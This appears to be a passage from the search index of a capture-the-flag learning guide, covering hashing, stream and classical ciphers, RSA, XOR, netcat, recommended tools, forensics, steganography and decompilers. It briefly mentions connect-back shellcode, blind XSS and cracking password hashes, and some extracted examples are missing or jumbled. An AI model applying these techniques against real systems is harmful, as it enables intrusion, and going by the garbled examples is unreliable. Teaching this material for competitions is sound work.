"}, {"location": "cryptography/what-are-block-ciphers/#requirements", "title": "Requirements", "text": "Hashing functions are one way functions which theoretically provide a unique output for every input. MD5, SHA-1, and other hashes which were considered secure are now found to have collisions or two different pieces of data which produce the same supposed unique output.
"}, {"location": "cryptography/what-are-hashing-functions/#string-hashing", "title": "String Hashing", "text": "A string hash is a number or string generated using an algorithm that runs on text or data.
The idea is that each hash should be unique to the text or data (although sometimes it isn\u2019t). For example, the hash for \u201cdog\u201d should be different from other hashes.
You can use command line tools tools or online resources such as this one. Example: $ echo -n password | md5 5f4dcc3b5aa765d61d8327deb882cf99
Here, \u201cpassword\u201d is hashed with different hashing algorithms:
Generally, when verifying a hash visually, you can simply look at the first and last four characters of the string.
"}, {"location": "cryptography/what-are-hashing-functions/#file-hashing", "title": "File Hashing", "text": "A file hash is a number or string generated using an algorithm that is run on text or data. The premise is that it should be unique to the text or data. If the file or text changes in any way, the hash will change.
What is it used for? - File and data identification - Password/certificate storage comparison
How can we determine the hash of a file? You can use the md5sum command (or similar).
$ md5sum samplefile.txt\n3b85ec9ab2984b91070128be6aae25eb samplefile.txt\n
"}, {"location": "cryptography/what-are-hashing-functions/#hash-collisions", "title": "Hash Collisions", "text": "A collision is when two pieces of data or text have the same cryptographic hash. This is very rare.
What\u2019s significant about collisions is that they can be used to crack password hashes. Passwords are usually stored as hashes on a computer, since it\u2019s hard to get the passwords from hashes.
If you bruteforce by trying every possible piece of text or data, eventually you\u2019ll find something with the same hash. Enter it, and the computer accepts it as if you entered the actual password.
Two different files on the same hard drive with the same cryptographic hash can be very interesting.
\u201cIt\u2019s now well-known that the cryptographic hash function MD5 has been broken,\u201d said Peter Selinger of Dalhousie University. \u201cIn March 2005, Xiaoyun Wang and Hongbo Yu of Shandong University in China published an article in which they described an algorithm that can find two different sequences of 128 bytes with the same MD5 hash.\u201d
For example, he cited this famous pair:
and
Each of these blocks has MD5 hash 79054025255fb1a26e4bc422aef54eb4.
Selinger said that \u201cthe algorithm of Wang and Yu can be used to create files of arbitrary length that have identical MD5 hashes, and that differ only in 128 bytes somewhere in the middle of the file. Several people have used this technique to create pairs of interesting files with identical MD5 hashes.\u201d
Ben Laurie has a nice website that visualizes this MD5 collision. For a non-technical, though slightly outdated, introduction to hash functions, see Steve Friedl\u2019s Illustrated Guide. And here\u2019s a good article from DFI News that explores the same topic.
"}, {"location": "cryptography/what-are-stream-ciphers/", "title": "Stream Ciphers", "text": "A Stream Cipher is used for symmetric key cryptography, or when the same key is used to encrypt and decrypt data. Stream Ciphers encrypt pseudorandom sequences with bits of plaintext in order to generate ciphertext, usually with XOR. A good way to think about Stream Ciphers is to think of them as generating one-time pads from a given state.
"}, {"location": "cryptography/what-are-stream-ciphers/#definitions", "title": "Definitions", "text": "A one time pad is an encryption mechanism whereby the entire plaintext is XOR'd with a random sequence of numbers in order to generate a random ciphertext. The advantage of the one time pad is that it offers an immense amount of security BUT in order for it to be useful, the randomly generated key must be distributed on a separate secure channel, meaning that one time pads have little use in modern day cryptographic applications on the internet. Stream ciphers extend upon this idea by using a key, usually 128 bit in length, in order to seed a pseudorandom keystream which is used to encrypt the text.
"}, {"location": "cryptography/what-are-stream-ciphers/#types-of-stream-ciphers", "title": "Types of Stream Ciphers", "text": ""}, {"location": "cryptography/what-are-stream-ciphers/#synchronous-stream-ciphers", "title": "Synchronous Stream Ciphers", "text": "A Synchronous Stream Cipher generates a keystream based on internal states not related to the plaintext or ciphertext. This means that the stream is generated pseudorandomly outside of the context of what is being encrypted. A binary additive stream cipher is the term used for a stream cipher which XOR's the bits with the bits of the plaintext. Encryption and decryption require that the synchronus state cipher be in the same state, otherwise the message cannot be decrypted.
"}, {"location": "cryptography/what-are-stream-ciphers/#self-synchronizing-stream-ciphers", "title": "Self-synchronizing Stream Ciphers", "text": "A Self-synchronizing Stream Cipher, also known as an asynchronous stream cipher or ciphertext autokey (CTAK), is a stream cipher which uses the previous N digits in order to compute the keystream used for the next N characters.
Note
Seems a lot like block ciphers doesn't it? That's because block cipher feedback mode (CFB) is an example of a self-synchronizing stream ciphers.
"}, {"location": "cryptography/what-are-stream-ciphers/#stream-cipher-vulnerabilities", "title": "Stream Cipher Vulnerabilities", "text": ""}, {"location": "cryptography/what-are-stream-ciphers/#key-reuse", "title": "Key Reuse", "text": "The key tenet of using stream ciphers securely is to NEVER repeat key use because of the communative property of XOR. If C~1~ and C~2~ have been XOR'd with a key K, retrieving that key K is trivial because C~1~ XOR C~2~ = P~1~ XOR P~2~ and having an english language based XOR means that cryptoanalysis tools such as a character frequency analysis will work well due to the low entropy of the english language.
"}, {"location": "cryptography/what-are-stream-ciphers/#bit-flipping-attack", "title": "Bit-flipping Attack", "text": "Another key tenet of using stream ciphers securely is considering that just because a message has been decrypted, it does not mean the message has not been tampered with. Because decryption is based on state, if an attacker knows the layout of the plaintext, a Man in the Middle (MITM) attack can flip a bit during transit altering the underlying ciphertext. If a ciphertext decrypts to 'Transfer $1000', then a middleman can flip a single bit in order for the ciphertext to decrypt to 'Transfer $9000' because changing a single character in the ciphertext does not affect the state in a synchronus stream cipher.
"}, {"location": "cryptography/what-is-a-substitution-cipher/", "title": "Substitution Cipher", "text": "A Substitution Cipher is system of encryption where different symobls substitute a normal alphabet.
"}, {"location": "cryptography/what-is-a-vigenere-cipher/", "title": "Vigenere Cipher", "text": "A Vigenere Cipher is an extended Caesar Cipher where a message is encrypted using various Caesar shifted alphabets.
The following table can be used to encode a message:
"}, {"location": "cryptography/what-is-a-vigenere-cipher/#encryption", "title": "Encryption", "text": "For example, encrypting the text SUPERSECRET
with CODE
would follow this process:
CODE
gets padded to the length of SUPERSECRET
so the key becomes CODECODECOD
SUPERSECRET
we use the table to get the Alphabet to use, in this instance row C
and column S
U
UISITGHGTSW
C
U
S
SUPERSECRET
The Caesar Cipher or Caesar Shift is a cipher which uses the alphabet in order to encode texts.
CAESAR
encoded with a shift of 8 is KIMAIZ
so ABCDEFGHIJKLMNOPQRSTUVWXYZ
becomes IJKLMNOPQRSTUVWXYZABCDEFGH
ROT13 is the same thing but a fixed shift of 13, this is a trivial cipher to bruteforce because there are only 25 shifts.
"}, {"location": "cryptography/what-is-rsa/", "title": "RSA", "text": "RSA, which is an abbreviation of the author's names (Rivest\u2013Shamir\u2013Adleman), is a cryptosystem which allows for asymmetric encryption. Asymmetric cryptosystems are alos commonly referred to as Public Key Cryptography where a public key is used to encrypt data and only a secret, private key can be used to decrypt the data.
"}, {"location": "cryptography/what-is-rsa/#definitions", "title": "Definitions", "text": "If public n, public e, private d are all very large numbers and a message m holds true for 0 < m < n, then we can say:
(m^e^)^d^ \u2261 m (mod n)
Note
The triple equals sign in this case refers to modular congruence which in this case means that there exists an integer k such that (m^e^)^d^ = kn + m
RSA is viable because it is incredibly hard to find d even with m, n, and e because factoring large numbers is an arduous process.
"}, {"location": "cryptography/what-is-rsa/#implementation", "title": "Implementation", "text": "RSA follows 4 steps to be implemented: 1. Key Generation 2. Encryption 3. Decryption
"}, {"location": "cryptography/what-is-rsa/#key-generation", "title": "Key Generation", "text": "We are going to follow along Wikipedia's small numbers example in order to make this idea a bit easier to understand.
Note
In This example we are using Carmichael's totient function where \u03bb(n) = lcm(\u03bb(p), \u03bb(q)), but Euler's totient function is perfectly valid to use with RSA. Euler's totient is \u03c6(n) = (p \u2212 1)(q \u2212 1)
Calculate \u03bb(n) = lcm(p-1, q-1)
Choose a public exponent such that 1 < e < \u03bb(n) and is coprime (not a factor of) \u03bb(n). The standard is most cases is 65537, but we will be using:
Now we have a public key of (3233, 17) and a private key of (3233, 413)
"}, {"location": "cryptography/what-is-rsa/#encryption", "title": "Encryption", "text": "With the public key, m can be encrypted trivially
The ciphertext is equal to m^e^ mod n or:
c = m^17^ mod 3233
"}, {"location": "cryptography/what-is-rsa/#decryption", "title": "Decryption", "text": "With the private key, m can be decrypted trivially as well
The plaintext is equal to c^d^ mod n or:
m = c^413^ mod 3233
"}, {"location": "cryptography/what-is-rsa/#exploitation", "title": "Exploitation", "text": "From the RsaCtfTool README
Attacks:
Data can be represented in different bases, an 'A' needs to be a numerical representation of Base 2 or binary so computers can understand them
"}, {"location": "cryptography/what-is-xor/#xor-basics", "title": "XOR Basics", "text": "An XOR or eXclusive OR is a bitwise operation indicated by ^
and shown by the following truth table:
So what XOR'ing bytes in the action 0xA0 ^ 0x2C
translates to is:
0b10001100
is equivelent to 0x8C
, a cool property of XOR is that it is reversable meaning 0x8C ^ 0x2C = 0xA0
and 0x8C ^ 0xA0 = 0x2C
XOR is a cheap way to encrypt data with a password. Any data can be encrypted using XOR as shown in this Python example:
>>> data = 'CAPTURETHEFLAG'\n>>> key = 'A'\n>>> encrypted = ''.join([chr(ord(x) ^ ord(key)) for x in data])\n>>> encrypted\n'\\x02\\x00\\x11\\x15\\x14\\x13\\x04\\x15\\t\\x04\\x07\\r\\x00\\x06'\n>>> decrypted = ''.join([chr(ord(x) ^ ord(key)) for x in encrypted])\n>>> decrypted\n'CAPTURETHEFLAG'\n
This can be extended using a multibyte key by iterating in parallel with the data.
"}, {"location": "cryptography/what-is-xor/#exploiting-xor-encryption", "title": "Exploiting XOR Encryption", "text": ""}, {"location": "cryptography/what-is-xor/#single-byte-xor-encryption", "title": "Single Byte XOR Encryption", "text": "Single Byte XOR Encryption is trivial to bruteforce as there are only 255 key combinations to try.
"}, {"location": "cryptography/what-is-xor/#multibyte-xor-encryption", "title": "Multibyte XOR Encryption", "text": "Multibyte XOR gets exponentially harder the longer the key, but if the encrypted text is long enough, character frequency analysis is a viable method to find the key. Character Frequency Analysis means that we split the cipher text into groups based on the number of characters in the key. These groups then are bruteforced using the idea that some letters appear more frequently in the english alphabet than others.
"}, {"location": "faq/connecting-to-services/", "title": "How to connect to services", "text": "Note
While service challenges are often connected to with netcat or PuTTY, solving them will sometimes require using a scripting language like Python. CTF players often use Python alongside pwntools.
You can run pwntools right in your browser by using repl.it.
"}, {"location": "faq/connecting-to-services/#using-netcat", "title": "Using netcat", "text": "netcat
is a networking utility found on macOS and linux operating systems and allows for easy connections to CTF challenges. Service challenges will commonly give you an address and a port to connect to. The syntax for connecting to a service challenge with netcat is nc <ip> <port>
.
Windows users can connect to service challenges using ConEmu, which can be downloaded here. Connecting to service challenges with ConEmu is done by running nc <ip> <port>
.
Occasionally, certain kinds of exploits will require a server to connect back to. Some examples are connect back shellcode, cross site request forgery (CSRF), or blind cross site scripting (XSS).
"}, {"location": "faq/i-need-a-server/#i-just-a-web-server", "title": "I just a web server", "text": "If you just need a web server to host simple static websites or check access logs, we recommend using PythonAnywhere to host a simple web application. You can program a simple web application in popular Python web frameworks (e.g. Flask) and host it there for free.
"}, {"location": "faq/i-need-a-server/#i-need-a-real-server", "title": "I need a real server", "text": "If you need a real server (perhaps to run complex calculations or for shellcode to connect back to), we recommend DigitalOcean. DigitalOcean has a cheap $4-6/month plan for a small server that can be freely configured to do whatever you need.
"}, {"location": "faq/recommended-software/", "title": "Recommended Software", "text": "Generally in cyber security competitions, it is up to you and your team to determine what software to use. In some cases you may even end up creating new tools to give you an edge! That being said, here are some applications that we recommend for most competitors for most competitions.
"}, {"location": "faq/recommended-software/#disassemblersdecompilers", "title": "Disassemblers/Decompilers", "text": "Ghidra
Ghidra is a disassembler and decompiler that is open source and free to use. Released by the NSA, Ghidra is a capable tool and is the recommended disassembler for most use cases. An alternative is IDA Pro (a cyber security industry standard), however IDA Pro is not free and licenses are very expensive.
Binary Ninja
Binary Ninja is a commercial disassembler (with a free demo application) that provides an aesthetic and easy to use interface for binary reverse engineering. It also has a Web-UI which can be used freely. Binary Ninja's API and intermediate language make it superior than other disassemblers for certain use cases.
Pwndbg for GDB
Pwndbg is a plugin for the GNU Debugger (gdb) which makes it easier to dynamically reverse an application by stepping through its execution. In order to use pwndbg you will first need to have gdb installed via a Linux virtual machine or similar.
WinDbg
WinDbg is a debugger for Windows applications.
Burp Suite
Burp Suite is an HTTP proxy and set of tools which allow you to view, edit and replay your HTTP requests. While Burp Suite is a commercial tool, it offers a free version which is very capable and usually all that's needed.
sqlmap
sqlmap is a penetration testing tool that automates hte process of detecting and exploiting SQL injection flaws. It's open source and freely available.
Google Chrome
Google Chrome is a web browser with a suite of developer tools and extensions. These tools and extensions can be useful when investigating a web application.
Wireshark
Wireshark is a PCAP analysis tool which allows you to analyze and record network traffic.
VMware
VMware is a company that creates virtualization software that allows you to run other operating systems within your existing operating system. While their products are not generally free, their software is best in class for virtualization.
VMWare Fusion, VMWare Workstation, and VMWare Player are three of their virtualization products that can be used on your computer to run other OS'es. VMWare Player is free to use for Windows and Linux.
VirtualBox
VirtualBox is open source virtualization software which allows you to virtualize other operating systems. It's very similar to VMWare products but free for all OS'es. It is generally slower than VMWare but works well enough for most people.
Python
Python is an easy-to-learn, widely used programming language which supports complex applications as well as small scripts. It has a large community which provides thousands of useful packages. Python is widely used in the cyber security industry and is generally the recommended language to use in CTF competition.
pwntools
Pwntools is a Python package which makes interacting with processes and networks easy. It is a recommended library for interacting with binary exploitation and networking based CTF challenges.
Note
You can run pwntools right in your browser by using repl.it. Create a new Python repl and install the pwntools
package. After that you'll be able to use pwntools directly from your browser without having to install anything.
CyberChef
CyberChef is a simple web app for analysing and decoding data without having to deal with complex tools or programming languages.
Forensics is the art of recovering the digital trail left on a computer. There are plenty of methods to find data which is seemingly deleted, not stored, or worse, covertly recorded.
An important part of forensics is having the right tools, as well as being familiar with the following topics:
File Extensions are not the sole way to identify the type of a file, files have certain leading bytes called file signatures which allow programs to parse the data in a consistent manner. Files can also contain additional \"hidden\" data called metadata which can be useful in finding out information about the context of a file's data.
"}, {"location": "forensics/what-are-file-formats/#file-signatures", "title": "File Signatures", "text": "File signatures (also known as File Magic Numbers) are bytes within a file used to identify the format of the file. Generally they\u2019re 2-4 bytes long, found at the beginning of a file.
"}, {"location": "forensics/what-are-file-formats/#what-is-it-used-for", "title": "What is it used for?", "text": "Files can sometimes come without an extension, or with incorrect ones. We use file signature analysis to identify the format (file type) of the file. Programs need to know the file type in order to open it properly.
"}, {"location": "forensics/what-are-file-formats/#how-do-you-find-the-file-signature", "title": "How do you find the file signature?", "text": "You need to be able to look at the binary data that constitutes the file you\u2019re examining. To do this, you\u2019ll use a hexadecimal editor. Once you find the file signature, you can check it against file signature repositories such as Gary Kessler\u2019s.
"}, {"location": "forensics/what-are-file-formats/#example", "title": "Example", "text": "The file above, when opened in a Hex Editor, begins with the bytes FFD8FFE0 00104A46 494600
or in ASCII \u02c7\u00ff\u02c7\u2021 JFIF
where \\x00
and \\x10
lack symbols.
Searching in Gary Kessler\u2019s database shows that this file signature belongs to a JPEG/JFIF graphics file
, exactly what we suspect.
A hexadecimal (hex) editor (also called a binary file editor or byte editor) is a computer program you can use to manipulate the fundamental binary data that constitutes a computer file. The name \u201chex\u201d comes from \u201chexadecimal,\u201d a standard numerical format for representing binary data. A typical computer file occupies multiple areas on the platter(s) of a disk drive, whose contents are combined to form the file. Hex editors that are designed to parse and edit sector data from the physical segments of floppy or hard disks are sometimes called sector editors or disk editors. A hex editor is used to see or edit the raw, exact contents of a file. Hex editors may used to correct data corrupted by a system or application. A list of editors can be found on the forensics Wiki. You can download one and install it on your system.
"}, {"location": "forensics/what-is-a-hex-editor/#example", "title": "Example", "text": "Open fileA.jpg in a hex editor. (Most Hex editors have either a \u201cFile > Open\u201d option or a simple drag and drop.)
When you open fileA.jpg in your hex editor, you should see something similar to this:
Your hex editor should also have a \u201cgo to\u201d or \u201cfind\u201d feature so you can jump to a specific byte.
"}, {"location": "forensics/what-is-disk-imaging/", "title": "Disk Imaging", "text": "A forensic image is an electronic copy of a drive (e.g. a hard drive, USB, etc.). It\u2019s a bit-by-\u00adbit or bitstream file that\u2019s an exact, unaltered copy of the media being duplicated.
Wikipedia said that the most straight\u00adforward disk imaging method is to read a disk from start to finish and write the data to a forensics image format. \u201cThis can be a time-consuming process, especially for disks with a large capacity,\u201d Wikipedia said.
To prevent write access to the disk, you can use a write blocker. It\u2019s also common to calculate a cryptographic hash of the entire disk when imaging it. \u201cCommonly-used cryptographic hashes are MD5, SHA1 and/or SHA256,\u201d said Wikipedia. \u201cBy recalculating the integrity hash at a later time, one can determine if the data in the disk image has been changed. This by itself provides no protection against intentional tampering, but it can indicate that the data was altered, e.g. due to corruption.\u201d
Why image a disk? Forensic imaging: - Prevents tampering with the original data\u00ad evidence - Allows you to play around with the copy, without worrying about messing up the original
"}, {"location": "forensics/what-is-disk-imaging/#forensic-image-extraction-exmple", "title": "Forensic Image Extraction Exmple", "text": "This example uses the tool AccessData FTK Imager.
Step 1: Go to File > Create Disk Image
Step 2: Select Physical Drive
, because the USB or hard drive you\u2019re imaging is a physical device or drive.
Step 3: Select the drive you\u2019re imaging. The 1000 GB is my computer hard drive; the 128 MB is the USB that I want to image.
Step 4: Add a new image destination
Step 5: Select whichever image type you want. Choose Raw (dd)
if you\u2019re a beginner, since it\u2019s the most common type
Step 6: Fill in all the evidence information
Step 7: Choose where you want to store it
Step 8: The image destination has been added. Now you can start the image extraction
Step 9: Wait for the image to be extracted
Step 10: This is the completed extraction
Step 11: Add the image you just created so that you can view it
Step 12: This time, choose image file, since that\u2019s what you just created
Step 13: Enter the path of the image you just created
Step 14: View the image.
Step 15: To view files in the USB, go to Partition 1 > [USB name] > [root]
in the Evidence Tree and look in the File List
Step 16: Selecting fileA, fileB, fileC, or fileD gives us some properties of the files & a preview of each photo
Step 17: Extract files of interest for further analysis by selecting, right-clicking and choosing Export Files
There are plenty of traces of someone's activity on a computer, but perhaps some of the most valuble information can be found within memory dumps, that is images taken of RAM. These dumps of data are often very large, but can be analyzed using a tool called Volatility
"}, {"location": "forensics/what-is-memory-forensics/#volatility-basics", "title": "Volatility Basics", "text": "Memory forensics isn't all that complicated, the hardest part would be using your toolset correctly. A good workflow is as follows:
strings
for cluesIn order to properly use Volatility you must supply a profile with --profile=PROFILE
, therefore before any sleuthing, you need to determine the profile using imageinfo:
$ python vol.py -f ~/image.raw imageinfo\nVolatility Foundation Volatility Framework 2.4\nDetermining profile based on KDBG search...\n\n Suggested Profile(s) : Win7SP0x64, Win7SP1x64, Win2008R2SP0x64, Win2008R2SP1x64\n AS Layer1 : AMD64PagedMemory (Kernel AS)\n AS Layer2 : FileAddressSpace (/Users/Michael/Desktop/win7_trial_64bit.raw)\n PAE type : PAE\n DTB : 0x187000L\n KDBG : 0xf80002803070\n Number of Processors : 1\n Image Type (Service Pack) : 0\n KPCR for CPU 0 : 0xfffff80002804d00L\n KUSER_SHARED_DATA : 0xfffff78000000000L\n Image date and time : 2012-02-22 11:29:02 UTC+0000\n Image local date and time : 2012-02-22 03:29:02 -0800\n
"}, {"location": "forensics/what-is-memory-forensics/#dump-processes", "title": "Dump Processes", "text": "In order to view processes, the pslist
or pstree
or psscan
command can be used.
$ python vol.py -f ~/image.raw pslist --profile=Win7SP0x64 pstree\nVolatility Foundation Volatility Framework 2.5\nOffset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit\n------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------\n0xffffa0ee12532180 System 4 0 108 0 ------ 0 2018-04-22 20:02:33 UTC+0000\n0xffffa0ee1389d040 smss.exe 232 4 3 0 ------ 0 2018-04-22 20:02:33 UTC+0000\n...\n0xffffa0ee128c6780 VBoxTray.exe 3324 1123 10 0 1 0 2018-04-22 20:02:55 UTC+0000\n0xffffa0ee14108780 OneDrive.exe 1422 1123 10 0 1 1 2018-04-22 20:02:55 UTC+0000\n0xffffa0ee14ade080 svchost.exe 228 121 1 0 1 0 2018-04-22 20:14:43 UTC+0000\n0xffffa0ee1122b080 notepad.exe 2019 1123 1 0 1 0 2018-04-22 20:14:49 UTC+0000\n
"}, {"location": "forensics/what-is-memory-forensics/#process-memory-dump", "title": "Process Memory Dump", "text": "Dumping the memory of a process can prove to be fruitful, say we want to dump the data from notepad.exe:
$ python vol.py -f ~/image.raw --profile=Win7SP0x64 memdump -p 2019 -D dump/\nVolatility Foundation Volatility Framework 2.4\n************************************************************************\nWriting System [ 2019] to 2019.dmp\n\n$ ls -alh dump/2019.dmp\n-rw-r--r-- 1 user staff 111M Apr 22 20:47 dump/2019.dmp\n
"}, {"location": "forensics/what-is-memory-forensics/#other-useful-commands", "title": "Other Useful Commands", "text": "There are plenty of commands that Volatility offers but some highlights include:
$ python vol.py -f IMAGE --profile=PROFILE connections
: view network connections$ python vol.py -f IMAGE --profile=PROFILE cmdscan
: view commands that were run in cmd promptMetadata is data about data. Different types of files have different metadata. The metadata on a photo could include dates, camera information, GPS location, comments, etc. For music, it could include the title, author, track number and album.
"}, {"location": "forensics/what-is-metadata/#what-kind-of-file-metadata-is-useful", "title": "What kind of file metadata is useful?", "text": "Potentially, any file metadata you can find could be useful.
"}, {"location": "forensics/what-is-metadata/#how-do-i-find-it", "title": "How do I find it?", "text": "Note
EXIF Data is metadata attached to photos which can include location, time, and device information.
One of our favorite tools is exiftool, which displays metadata for an input file, including: - File size - Dimensions (width and height) - File type - Programs used to create (e.g. Photoshop) - OS used to create (e.g. Apple)
Run command line: exiftool(-k).exe [filename]
and you should see something like this:
Let's take a look at File A's metadata with exiftool:
File type
Image description
Make and camera info
GPS Latitude/Longitude
"}, {"location": "forensics/what-is-metadata/#timestamps", "title": "Timestamps", "text": "Timestamps are data that indicate the time of certain events (MAC): - Modification \u2013 when a file was modified - Access \u2013 when a file or entries were read or accessed - Creation \u2013 when files or entries were created
"}, {"location": "forensics/what-is-metadata/#types-of-timestamps", "title": "Types of timestamps", "text": "Certain events such as creating, moving, copying, opening, editing, etc. might affect the MAC times. If the MAC timestamps can be attained, a timeline of events could be created.
"}, {"location": "forensics/what-is-metadata/#timeline-patterns", "title": "Timeline Patterns", "text": "There are plenty more patterns than the ones introduced below, but these are the basics you should start with to get a good understanding of how it works, and to complete this challenge.
"}, {"location": "forensics/what-is-metadata/#examples", "title": "Examples", "text": "
We know that the BMP files fileA and fileD are the same, but that the JPEG files fileB and fileC are different somehow. So how can we find out what went on with these files?
By using time stamp information from the file system, we can learn that the BMP fileD was the original file, with fileA being a copy of the original. Afterward, fileB was created by modifying fileB, and fileC was created by modifying fileA in a different way.
Follow along as we demonstrate.
We\u2019ll start by analyzing images in AccessData FTK Imager, where there\u2019s a Properties window that shows you some information about the file or folder you\u2019ve selected.
Here are the extracted MAC times for fileA, fileB, fileC and fileD: Note, AccessData FTK Imager assumes that the file times on the drive are in UTC (Universal Coordinated Time). I subtracted four hours, since the USB was set up in Eastern Standard Time. This isn\u2019t necessary, but it helps me understand the times a bit better.
Highlight timestamps that are the same, if timestamps are off by a few seconds, they should be counted as the same. This lets you see a clear difference between different timestamps. Then, highlight oldest to newest to help put them in order.
Identify timestamp patterns.
"}, {"location": "forensics/what-is-stegonagraphy/", "title": "Steganography", "text": "Steganography is the practice of hiding data in plain sight. Steganography is often embedded in images or audio.
You could send a picture of a cat to a friend and hide text inside. Looking at the image, there\u2019s nothing to make anyone think there\u2019s a message hidden inside it.
You could also hide a second image inside the first.
"}, {"location": "forensics/what-is-stegonagraphy/#steganography-detection", "title": "Steganography Detection", "text": "So we can hide text and an image, how do we find out if there is hidden data?
FileA and FileD appear the same, but they\u2019re different. Also, FileD was modified after it was copied, so it\u2019s possible there might be steganography in it.
FileB and FileC don\u2019t appear to have been modified after being created. That doesn\u2019t rule out the possibility that there\u2019s steganography in them, but you\u2019re more likely to find it in fileD. This brings up two questions:
File are made of bytes. Each byte is composed of eight bits.
Changing the least-significant bit (LSB) doesn\u2019t change the value very much.
So we can modify the LSB without changing the file noticeably. By doing so, we can hide a message inside.
"}, {"location": "forensics/what-is-stegonagraphy/#lsb-steganography-in-images", "title": "LSB Steganography in Images", "text": "LSB Steganography or Least Significant Bit Steganography is a method of Steganography where data is recorded in the lowest bit of a byte.
Say an image has a pixel with an RGB value of (255, 255, 255), the bits of those RGB values will look like
1 1 1 1 1 1 1 1By modifying the lowest, or least significant, bit, we can use the 1 bit space across every RGB value for every pixel to construct a message.
1 1 1 1 1 1 1 0The reason steganography is hard to detect by sight is because a 1 bit difference in color is insignificant as seen below.
"}, {"location": "forensics/what-is-stegonagraphy/#example", "title": "Example", "text": "Let\u2019s say we have an image, and part of it contains the following binary:
And let\u2019s say we want to hide the character y inside.
First, we need to convert the hidden message to binary.
Now we take each bit from the hidden message and replace the LSB of the corresponding byte with it.
And again:
And again:
And again:
And again:
And again:
And again:
And once more:
Decoding LSB steganography is exactly the same as encoding, but in reverse. For each byte, grab the LSB and add it to your decoded message. Once you\u2019ve gone through each byte, convert all the LSBs you grabbed into text or a file. (You can use your file signature knowledge here!)
"}, {"location": "forensics/what-is-stegonagraphy/#what-other-types-of-steganography-are-there", "title": "What other types of steganography are there?", "text": "Steganography is hard for the defense side, because there\u2019s practically an infinite number of ways it could be carried out. Here are a few examples: - LSB steganography: different bits, different bit combinations - Encode in every certain number of bytes - Use a password - Hide in different places - Use encryption on top of steganography
"}, {"location": "forensics/what-is-wireshark/", "title": "Wireshark", "text": "Note from our infrastructure team
\"Wireshark saved me hours on my last tax return! - David\"
\"[Wireshark] is great for ruining your weekend and fixing pesky networking problems!\" - Max\"
\"Wireshark is the powerhouse of the cell. - Joe\"
\"Does this cable do anything? - Ayyaz\"
Wireshark is a network protocol analyzer which is often used in CTF challenges to look at recorded network traffic. Wireshark uses a filetype called PCAP to record traffic. PCAPs are often distributed in CTF challenges to provide recorded traffic history.
"}, {"location": "forensics/what-is-wireshark/#interface", "title": "Interface", "text": "Upon opening Wireshark, you are greeted with the option to open a PCAP or begin capturing network traffic on your device.
The network traffic displayed initially shows the packets in order of which they were captured. You can filter packets by protocol, source IP address, destination IP address, length, etc.
In order to apply filters, simply enter the constraining factor, for example 'http', in the display filter bar.
Filters can be chained together using '&&' notation. In order to filter by IP, ensure a double equals '==' is used.
The most pertinent part of a packet is its data payload and protocol information.
"}, {"location": "forensics/what-is-wireshark/#decrypting-ssl-traffic", "title": "Decrypting SSL Traffic", "text": "By default, Wireshark cannot decrypt SSL traffic on your device unless you grant it specific certificates.
"}, {"location": "forensics/what-is-wireshark/#high-level-ssl-handshake-overview", "title": "High Level SSL Handshake Overview", "text": "In order for a network session to be encrypted properly, the client and server must share a common secret for which they can use to encrypt and decrypt data without someone in the middle being able to guess. The SSL Handshake loosely follows this format:
There are several ways to be able to decrypt traffic.
Reverse Engineering in a CTF is typically the process of taking a compiled (machine code, bytecode) program and converting it back into a more human readable format.
Very often the goal of a reverse engineering challenge is to understand the functionality of a given program such that you can identify deeper issues.
Decompilers do the impossible and reverse compiled code back into psuedocode/code.
IDA offers HexRays, which translates machine code into a higher language pseudocode.
"}, {"location": "reverse-engineering/what-are-decompilers/#example-workflow", "title": "Example Workflow", "text": "Let's say we are disassembling a program which has the source code:
#include <stdio.h>\n\nvoid printSpacer(int num){\n for(int i = 0; i < num; ++i){\n printf(\"-\");\n }\n printf(\"\\n\");\n}\n\nint main()\n{\n char* string = \"Hello, World!\";\n for(int i = 0; i < 13; ++i){\n printf(\"%c\", string[i]);\n for(int j = i+1; j < 13; j++){\n printf(\"%c\", string[j]);\n }\n printf(\"\\n\");\n printSpacer(13 - i);\n }\n return 0;\n}\n
And creates an output of:
Hello, World!\n-------------\nello, World!\n------------\nllo, World!\n-----------\nlo, World!\n----------\no, World!\n---------\n, World!\n--------\n World!\n-------\nWorld!\n------\norld!\n-----\nrld!\n----\nld!\n---\nd!\n--\n!\n-\n
If we are given a binary compiled from that source and we want to figure out how the source looks, we can use a decompiler to get c pseudocode which we can then use to reconstruct the function. The sample decompilation can look like:
printSpacer:\nint __fastcall printSpacer(int a1)\n{\n int i; // [rsp+8h] [rbp-8h]\n\n for ( i = 0; i < a1; ++i )\n printf(\"-\");\n return printf(\"\\n\");\n}\n\nmain:\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n int v4; // [rsp+18h] [rbp-18h]\n signed int i; // [rsp+1Ch] [rbp-14h]\n\n for ( i = 0; i < 13; ++i )\n {\n v4 = i + 1;\n printf(\"%c\", (unsigned int)aHelloWorld[i], envp);\n while ( v4 < 13 )\n printf(\"%c\", (unsigned int)aHelloWorld[v4++]);\n printf(\"\\n\");\n printSpacer(13 - i);\n }\n return 0;\n}\n
A good method of getting a good representation of the source is to convert the decompilation into Python since Python is basically psuedocode that runs. Starting with main often allows you to gain a good overview of what the program is doing and will help you translate the other functions.
"}, {"location": "reverse-engineering/what-are-decompilers/#main", "title": "Main", "text": "We know we will start with a main function and some variables, if you trace the execution of the variables, you can oftentimes determine the variable type. Because i is being used as an index, we know its an int, and because v4 used as one later on, it too is an index. We can also see that we have a variable aHelloWorld being printed with \"%c\", we can determine it represents the 'Hello, World!' string. Lets define all these variables in our Python main function:
def main():\n string = \"Hello, World!\"\n i = 0\n v4 = 0\n for i in range(0, 13):\n v4 = i + 1\n print(string[i], end='')\n while v4 < 13:\n print(string[v4], end='')\n v4 += 1\n print()\n printSpacer(13-i)\n
"}, {"location": "reverse-engineering/what-are-decompilers/#printspacer-function", "title": "printSpacer Function", "text": "Now we can see that printSpacer is clearly being fed an int value. Translating it into python shouldn't be too hard.
def printSpacer(number):\n i = 0\n for i in range(0, number):\n print(\"-\", end='')\n print()\n
"}, {"location": "reverse-engineering/what-are-decompilers/#results", "title": "Results", "text": "Running main() gives us:
Hello, World!\n-------------\nello, World!\n------------\nllo, World!\n-----------\nlo, World!\n----------\no, World!\n---------\n, World!\n--------\n World!\n-------\nWorld!\n------\norld!\n-----\nrld!\n----\nld!\n---\nd!\n--\n!\n-\n
"}, {"location": "reverse-engineering/what-are-disassemblers/", "title": "Disassemblers", "text": "A disassembler is a tool which breaks down a compiled program into machine code.
